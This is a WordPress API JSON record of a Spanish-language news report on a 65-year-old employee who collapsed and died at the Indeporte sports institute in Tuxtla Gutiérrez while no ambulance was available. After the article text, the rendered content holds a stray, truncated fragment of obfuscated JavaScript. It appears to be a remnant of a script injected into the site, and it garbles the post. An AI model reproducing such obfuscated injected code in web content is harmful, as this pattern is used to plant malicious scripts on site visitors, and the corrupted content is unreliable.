{"id":8468,"date":"2023-02-02T02:47:08","date_gmt":"2023-02-02T02:47:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8468"},"modified":"2023-02-02T02:47:09","modified_gmt":"2023-02-02T02:47:09","slug":"muere-empleado-al-interior-del-indeporte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8468","title":{"rendered":"Muere empleado al Interior del Indeporte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675305980209.jpg\" alt=\"\" class=\"wp-image-8469\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675305980209.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675305980209-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 1 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un empleado de 65 a\u00f1os del Indeporte perdi\u00f3 la vida al interior de las instalaciones este mi\u00e9rcoles por la ma\u00f1ana.Los mismos empleados reportaron que, el hombre de la tercera edad identificado como Arturo &#8220;N&#8221; se encontraba laborando en las instalaciones localizadas en el Bulevar \u00c1ngel Albino Corzo y Calzada Samuel Le\u00f3n Brindis cuando de manera repentina se desvaneci\u00f3.Sus compa\u00f1eros llamaron a los n\u00fameros de emergencias pero no hab\u00edan ambulancias disponibles en ese momento.Por esta raz\u00f3n fue trasladado al \u00e1rea de medicina deportiva donde fue diagnosticado muerto a causa de un presunto paro cardio respiratorio.Al lugar arribaron elementos de la polic\u00eda para acordonar el \u00e1rea.Peritos de la Fiscal\u00eda General del Estado, arribaron al lugar para realizar las diligencias correspondientes levantar el cuerpo y trasladarlo al SEMEFO donde se practicar\u00eda la necropsia de ley para determinar las causas concretas de la muerte.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 1 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un empleado de 65 a\u00f1os del Indeporte perdi\u00f3 la vida al interior de las instalaciones este mi\u00e9rcoles por la ma\u00f1ana.Los mismos empleados reportaron que, el hombre de la tercera edad identificado como Arturo &#8220;N&#8221; se encontraba laborando en las instalaciones localizadas en el Bulevar \u00c1ngel &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8468","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8468","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8468"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8468\/revisions"}],"predecessor-version":[{"id":8470,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8468\/revisions\/8470"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8469"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8468"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8468"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}